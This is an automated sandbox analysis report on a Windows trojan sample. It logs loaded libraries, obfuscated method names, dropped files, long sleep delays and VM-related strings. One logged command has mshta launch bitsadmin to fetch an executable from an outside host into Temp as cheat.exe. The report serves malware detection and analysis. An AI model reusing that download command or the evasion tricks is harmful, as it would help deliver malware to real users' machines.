          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb 2 source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdbRSDSC source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp, WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdbH source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb p source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2125161031.00000226E8E66000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeCode function: 0_2_00007FFD9B7000AD pushad ; iretd 0_2_00007FFD9B7000C1
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715A0D push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7159E0 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7160F6 push esp; ret 2_2_00007FFD9B716139
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715909 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715948 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B70D893 push 8B485F4Bh; iretd 2_2_00007FFD9B70D89B
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B711ED0 push esp; ret 2_2_00007FFD9B716139
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7146D8 push esp; retf 2_2_00007FFD9B7146D9
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: section name: .text entropy: 7.998024903988678
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, J3bNBBaEj3XpotbKkdmI2LHeIo6vzeGA9owP.csHigh entropy of concatenated method names: 'bhFViFnVTAJvqX52Huv9Lwtp4GgZ3AIhomUk', 'Vl7lE9r1BdgyyoWEiDhMvm3JrrX1UyYHFYWK', 'Do20jlpZL3VUljnG65apy0gUHfT7Pj3KTKiW', 'WCgaLvNuFRyyZ0IgxQ0AtTwOrrJaPi4TS4hd', 'ngJEom17n8DocYyU6KBoo8t9G2Tw3MELHyiW', 'aXtPYyC6WscWby3Qc1nAhpvGjCZrbRCoF6gl', '_6tnzvonW56ELrUebvZqzIyGnDR6iRsUKxMIu', 'sUhNuhoog0K45hpcCx9wiYODSbbceOZg7uGK', 'ezkF5P0dhgu2f5dxlgHMKLttaLSMutMJifSd', '_9nWz4yxNIKppv2UE5CH65tH3ctLgVbBINAnw'
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, CL7y0BCvM3ox66FIaQoqW8cIKqSeQcWw1csq.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_7cpKXRoyYs0wOJKv8X7kitC7ifExUjrHXQUJ', 'rBkrAMqdY4E8l4p5ZYjVreDoVB0SgakFyLBN', 'GQYb04q2ltnxZ4Boyl4zVKVxB9bQZblobCy0', 'UwpHAQTDjChblu92YW7Btfh04q9FtnEPuXQJ'

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe File created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe (dropped file)
          Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Temp\BITD1EE.tmp (dropped file)
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Memory allocated: 15C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Memory allocated: 1B0B0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Memory allocated: 226E6C00000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Memory allocated: 226E8780000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599875
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599766
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599641
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599516
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599406
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599297
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599188
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 599063
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 598938
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 598756
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 598578
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 598225
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 598098
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597969
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597844
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597734
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597625
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597516
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597406
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597297
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597187
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 597078
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596969
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596849
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596719
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596609
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596500
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596377
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596250
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596140
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 596031
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595922
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595795
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595659
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595536
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595406
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595266
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 595047
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594908
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594781
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594672
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594562
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594453
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594299
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594172
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 594047
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593937
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593828
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593719
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593594
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593484
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Thread delayed: delay time: 593375
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Window / User API: threadDelayed 3064
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Window / User API: threadDelayed 6762
          Source: C:\Windows\System32\svchost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BITD1EE.tmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe TID: 6160 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -27670116110564310s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -600000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599875s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599766s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599641s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599516s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599406s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599297s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599188s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -599063s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -598938s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -598756s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -598578s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -598225s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -598098s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597969s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597844s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597734s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597625s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597516s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597406s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597297s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597187s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -597078s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596969s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596849s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596719s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596609s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596500s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596377s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596250s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596140s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -596031s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595922s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595795s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595659s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595536s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595406s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595266s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -595047s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594908s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594781s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594672s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594562s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594453s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594299s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594172s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -594047s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593937s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593828s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593719s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593594s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593484s >= -30000s
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe TID: 6188 Thread sleep time: -593375s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6420 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: Amcache.hve.12.dr Binary or memory string: VMware
          Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
          Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
          Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
          Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: svchost.exe, 00000006.00000002.3115711007.00000230ADC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116767133.00000230B325B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116729332.00000230B3240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: BootstrapperV1.19.exe, 00000002.00000002.2124484152.00000226E6B21000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
          Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
          Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
          Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
          Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\svchost.exe File created: BITD1EE.tmp.6.dr
          Source: Yara match File source: Process Memory Space: BootstrapperV1.19.exe PID: 6516, type: MEMORYSTR
          Source: Yara match File source: \Device\ConDrv, type: DROPPED
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
